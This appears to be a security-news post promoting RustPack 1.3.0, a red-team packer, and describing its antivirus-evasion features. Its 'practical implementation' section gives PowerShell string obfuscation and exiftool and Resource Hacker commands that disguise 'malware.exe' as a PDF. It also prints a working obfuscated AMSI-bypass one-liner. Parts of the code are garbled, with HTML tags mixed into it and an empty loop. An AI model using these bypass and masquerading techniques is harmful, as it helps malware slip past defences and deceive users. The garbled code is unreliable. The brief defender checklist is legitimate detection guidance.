Listen to this Post
RustPack version 1.3.0 introduces significant improvements in evading detection mechanisms, making it a powerful tool for red teamers and penetration testers. This release focuses on reducing Indicators of Compromise (IoCs), enhancing AMSI/ETW bypass techniques, and improving payload metadata randomization.
Key Features
1. Reduced IoCs via Legitimate-Looking Encoding
Instead of using suspicious string-based encoding (UUID, MAC, IPv4 endings), RustPack now employs an encoding method that mimics legitimate code, lowering entropy-based detection risks.
2. Expanded AMSI & ETW Bypass Techniques
- 7 AMSI Bypasses (including a customized Ruy-Lopez version that blocks AMSI-related DLLs and userland hooks).
- 5 ETW Bypasses (some unpublished in open-source tools for long-term evasion).
3. Randomized Metadata & Icons
- Executables/DLLs now use randomized copyright info, versions, and icons.
- Operators can clone metadata/icons from benign files (e.g., PDFs) for further stealth.
You Should Know: Practical Implementation
1. Simulating RustPack’s String Obfuscation
To mimic RustPack’s encoding, use XOR-based obfuscation in PowerShell:
$plainText = "malicious_payload"
$key = 0x55
$obfuscated = $plainText.ToCharArray() | % { [char]($_ -bxor $key) }
$obfuscated -join ""
2. Testing AMSI Bypasses
Try the Ruy-Lopez-inspired bypass (blocking AMSI DLLs):
$amsiDlls = @("amsi.dll", "user32.dll")
foreach ($dll in $amsiDlls) {
}
3. Cloning File Metadata (Linux/Windows)
- Windows (via PowerShell):
(Get-Item "legit.pdf").VersionInfo | fl<br /> (Get-Item "malware.exe").VersionInfo.FileDescription = "Adobe PDF Reader"
-
Linux (using
exiftool):exiftool -TagsFromFile legit.pdf malware.exe
4. Randomizing Icons on Windows
Use `Resource Hacker` to swap icons:
ResourceHacker -open malware.exe -save output.exe -action addskip -res legit.ico -mask ICONGROUP,1,
What Undercode Say
RustPack 1.3.0 exemplifies modern anti-forensic techniques, blending into legitimate environments while evading AV/EDR. Key takeaways:
– Obfuscation > Encryption (lower entropy = fewer alerts).
– AMSI/ETW bypasses must evolve (vendors catch up quickly).
– Metadata matters (randomized/icons reduce heuristic flags).
For defenders:
- Monitor unusual DLL loading (e.g., `amsi.dll` blocked).
- Analyze file metadata inconsistencies (e.g., EXE with PDF icon).
- Hunt for XOR-encoded strings in process memory.
Expected Output:
Sample AMSI bypass (one-liner)
sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( <a href=""{1}{0}"-F'F','rE'">TYpE</a> ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A<code>ss</code>Embly"."GET<code>TY</code>Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g<code>etf</code>iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE<code>T</code>VaLUE"( ${n<code>ULl},${t</code>RuE} )
Relevant URLs:
- MSec Operations UG (Contact for RustPack)
Expected Output:
A technical deep-dive into RustPack’s evasion techniques, including PoC commands for red teams and detection logic for blue teams.
References:
Reported By: Msec Operations – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
